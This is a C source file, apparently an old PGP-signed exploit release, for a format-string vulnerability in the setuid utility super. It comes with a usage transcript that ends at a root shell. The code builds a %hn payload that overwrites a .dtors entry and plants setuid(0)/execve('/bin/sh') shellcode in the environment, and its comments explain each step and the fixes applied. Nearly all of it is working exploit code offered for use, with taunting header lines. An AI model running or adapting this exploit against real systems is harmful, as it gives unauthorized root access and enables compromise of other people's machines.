-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
/*
!!! ITS NOT TOO LATE..BUT HURRY !!!
!!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!
Political statement:
/*
hehehe ;PPpPPPPp
/* Proof of concept (the .dtors address used below is specific to the binary shown; read it from your own copy of super with objdump as in the next step and pass the start of the section -- the exploit itself adds 4 to reach the entry it overwrites):
$ gcc GOBBLES-own-super.c -o GOBBLES-own-super
$ ./GOBBLES-own-super
Usage:
./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]
$ objdump -s -j .dtors /usr/local/bin/super
/usr/local/bin/super: file format elf32-i386
Contents of section .dtors:
8063f7c ffffffff 00000000 …
$ ./GOBBLES-own-super -t 0x8063f7c
. target @ 0x8063f80
. shellcode @ 0xbfffffb0
. username: 9 bytes
super: No such super command as `xx??%.49103x%29$hn%.16305x%30$hn'.
sh-2.05#
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>
/* Default -A: number of 'x' bytes placed in front of the payload (buildstring()
 * writes at most 4), presumably to word-align the embedded addresses once the
 * string sits on super's stack — tune with -A if the writes miss. */
#define ALLIGN 2
/* Default -o: printf positional index used in the payload (`%29$hn`); the
 * second write uses DPA + 1.  Presumably where super's vulnerable format call
 * finds the first embedded address — verify against the target build. */
#define DPA 29
/* Path of the setuid target; also the basis of the stack-shift heuristic in main(). */
#define SUPER "/usr/local/bin/super"
void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);
/* C-library environment pointer, needed for the execve() self re-exec in main(). */
extern char **environ;
/* Payload buffer filled by buildstring() and handed to super as its only argument. */
char string[256];
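/*
 * Print the command-line synopsis to stderr.
 */
static void
usage(const char *prog)
{
	fprintf(stderr, "\nUsage: \n%s -t <.dtors address> [ -o <offset> -A <allignment> ]\n", prog);
}

/*
 * Parse a decimal option value (-o / -A).  Exits 1 with a message on junk
 * input instead of silently turning it into 0 the way atoi() does.
 */
static int
parse_int(const char *s, const char *what)
{
	char *end;
	long v = strtol(s, &end, 10);

	if (end == s || *end != '\0') {
		fprintf(stderr, ". bad %s `%s'\n", what, s);
		exit(1);
	}
	return (int)v;
}

/*
 * Local exploit driver for a format-string bug in super(1).
 *
 * Flow:
 *   1. -t gives the start of super's .dtors section; the entry that gets
 *      overwritten is the word after the 0xffffffff head marker, hence +4.
 *   2. The shellcode travels in the environment variable GOBBLES.  On the
 *      first run it is not set yet: stuff() exports it and the program
 *      re-executes itself, so that in the second image getenv() returns the
 *      shellcode's real stack address.
 *   3. That address is corrected by the length difference between our own
 *      path and SUPER's.  The assumption is that the environment strings sit
 *      just below the exec'd program path on the stack and therefore move by
 *      exactly that many bytes once super is started — a heuristic; adjust
 *      with -A/-o or re-check the layout if the target misses.
 *   4. buildstring() produces the %hn payload and super is exec'd with it as
 *      its single argument.
 *
 * Options: -t <addr> (required, hex with 0x accepted), -o <printf positional
 * index, default DPA>, -A <pad bytes, default ALLIGN>.  Prints usage and
 * exits 0 when run without arguments; exits 1 on any error.
 *
 * Fixes relative to the original: t/w are no longer used uninitialised when
 * -t is missing, getopt's int result is not stored in a char (EOF compare
 * breaks where char is unsigned), %p gets real pointers, the usage literal
 * is a single string again, and execl's sentinel is a typed NULL.
 */
int
main(int argc, char **argv)
{
	unsigned long t = 0;	/* .dtors entry to overwrite (argument + 4) */
	unsigned long w;	/* address the shellcode will have inside super */
	int dpa = DPA, allign = ALLIGN, have_target = 0, c;
	long shift;
	char *store, *end;

	if (argc == 1) {
		usage(argv[0]);
		exit(0);
	}

	while ((c = getopt(argc, argv, "t:o:A:")) != -1) {
		switch (c) {
		case 't':
			/* base 0: accepts the 0x... form objdump prints */
			t = strtoul(optarg, &end, 0);
			if (end == optarg || *end != '\0') {
				fprintf(stderr, ". bad .dtors address `%s'\n", optarg);
				exit(1);
			}
			t += 4;
			have_target = 1;
			break;
		case 'o':
			dpa = parse_int(optarg, "offset");
			break;
		case 'A':
			allign = parse_int(optarg, "allignment");
			break;
		default:
			fprintf(stderr, "hehehe ;PPppPPPp\n");
			exit(0);
		}
	}
	if (!have_target) {
		usage(argv[0]);
		exit(1);
	}

	/*
	 * First image: export the shellcode and start over.  execve() does not
	 * search PATH, so argv[0] must be a usable path (./GOBBLES-own-super as
	 * in the header transcript).  stuff() exits if setenv() fails, which
	 * keeps this from re-executing forever.
	 */
	if ((store = getenv("GOBBLES")) == NULL) {
		stuff();
		execve(argv[0], argv, environ);
		/* only reached when execve() failed */
		fprintf(stderr, ". problem re-executing\n");
		exit(1);
	}

	/* Second image: getenv() now points at the shellcode on our stack. */
	w = (unsigned long)store;
	/* Signed difference so the correction works in both directions. */
	shift = (long)strlen(argv[0]) - (long)strlen(SUPER);
	w += shift;

	fprintf(stderr, ". target @ %p\n. shellcode @ %p\n", (void *)t, (void *)w);
	buildstring(t, w, dpa, allign);

	execl(SUPER, "super", string, (char *)NULL);
	/* only reached when execl() failed */
	fprintf(stderr, "error executing\n");
	exit(1);
}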
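/*
 * Build super's argument (global `string`): a format string that makes two
 * %hn writes store the 32-bit shellcode address w into the .dtors entry t.
 *
 * Payload layout:
 *   ['x' * pad][addr A][addr B]%.<c1>x%<dpa>$hn%.<c2>x%<dpa+1>$hn
 *
 * A and B are t and t+2, i.e. the low and the high half of the entry
 * (little-endian).  Each %hn stores the number of characters printed so far
 * as a 16-bit value and that count only ever grows, so the half of w with
 * the smaller value must be written first; the second precision only tops
 * the count up by the difference.  The count seen by the first %hn is what
 * super prints before our string (PREFIX_LEN plus the user name, which the
 * header transcript shows in that message) plus our pad and the eight
 * address bytes plus the first precision.  Precision is a minimum digit
 * count, so if the stack word super formats has more hex digits than
 * requested the count overshoots — adjust -o/-A if the writes land wrong.
 *
 * Parameters: t = .dtors entry (already +4), w = shellcode address,
 * dpa = positional index of the first embedded address on super's printf
 * stack, allign = number of 'x' pad bytes (clamped to 0..4).
 * Exits 1 if the user name can't be looked up, if any address byte is 0x00
 * (argv can't carry NUL) or if the payload does not fit in `string`.
 *
 * Fixes relative to the original: the counts are printed with %hu — %hd
 * rendered anything above 32767 (e.g. the 49103 in the header transcript)
 * as a negative precision; the pad buffer is always NUL-terminated (-A 4 or
 * a negative value used to make %s read past it); the high address is t+2
 * with carry instead of only bumping the low byte.
 */
void
buildstring(unsigned long t, unsigned long w, int dpa, int allign)
{
	enum {
		PREFIX_LEN = 29,	/* bytes super prints before our string — presumably its fixed error-message text; TODO confirm against the target */
		MAX_PAD = 4
	};
	unsigned char lo[4], hi[4];	/* bytes of t and t+2, little-endian */
	const unsigned char *first, *second;
	unsigned int hi_half, lo_half, first_cnt, second_cnt, prefix, namelen;
	unsigned int pad, i;
	char a_buf[MAX_PAD + 1];
	struct passwd *pass;
	int n;

	memset(string, '\0', sizeof(string));
	memset(a_buf, '\0', sizeof(a_buf));

	if ((pass = getpwuid(getuid())) == NULL) {
		fprintf(stderr, ". can't find your username\n");
		exit(1);
	}
	namelen = strlen(pass->pw_name);
	fprintf(stderr, ". username: %u bytes\n", namelen);

	/* Clamp so the pad always leaves room for the terminator. */
	if (allign < 0)
		pad = 0;
	else if (allign > MAX_PAD)
		pad = MAX_PAD;
	else
		pad = (unsigned int)allign;
	for (i = 0; i < pad; i++)
		a_buf[i] = 'x';

	/* The payload travels through argv, so no address byte may be 0x00. */
	for (i = 0; i < 4; i++) {
		lo[i] = (t >> (8 * i)) & 0xff;
		hi[i] = ((t + 2) >> (8 * i)) & 0xff;
		if (lo[i] == 0 || hi[i] == 0) {
			fprintf(stderr, ". target address contains a NUL byte, it can't be passed in argv\n");
			exit(1);
		}
	}

	hi_half = (w >> 16) & 0xffff;	/* goes to t+2 */
	lo_half = w & 0xffff;		/* goes to t */
	prefix = 8 + pad + PREFIX_LEN + namelen;

	/* Smaller half first; the counts are 16-bit, wrap is intended. */
	if (hi_half < lo_half) {
		first = hi;
		second = lo;
		first_cnt = hi_half - prefix;
		second_cnt = lo_half - hi_half;
	} else {
		first = lo;
		second = hi;
		first_cnt = lo_half - prefix;
		second_cnt = hi_half - lo_half;
	}

	n = snprintf(string, sizeof(string) - 1,
	    "%s" "%c%c%c%c%c%c%c%c" "%%.%hux%%%d$hn" "%%.%hux%%%d$hn",
	    a_buf,
	    first[0], first[1], first[2], first[3],
	    second[0], second[1], second[2], second[3],
	    first_cnt, dpa, second_cnt, dpa + 1);
	if (n < 0 || (size_t)n >= sizeof(string) - 1) {
		fprintf(stderr, ". payload does not fit in the buffer\n");
		exit(1);
	}
}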
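/*
 * Export the shellcode as environment variable GOBBLES so that, after main()
 * re-executes the program, it sits at a stack address getenv() can report.
 *
 * The bytes decode to i386 Linux: setuid(0) (eax = 0x17, int 0x80), the
 * usual jmp/call trick to execve() the trailing "/bin/sh" string, then
 * exit().  They contain no 0x00, which is what lets them survive as a C
 * string through setenv() and the kernel's environment copy.
 *
 * Exits 1 if setenv() fails: main() re-executes the program until GOBBLES
 * is present, so returning silently here would loop forever.
 */
void
stuff(void)
{
	static const char code[] =
	    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
	    "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
	    "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
	    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

	if (setenv("GOBBLES", code, 1) != 0) {
		fprintf(stderr, ". can't export the shellcode into the environment\n");
		exit(1);
	}
}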
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
=xfu0
-----END PGP SIGNATURE-----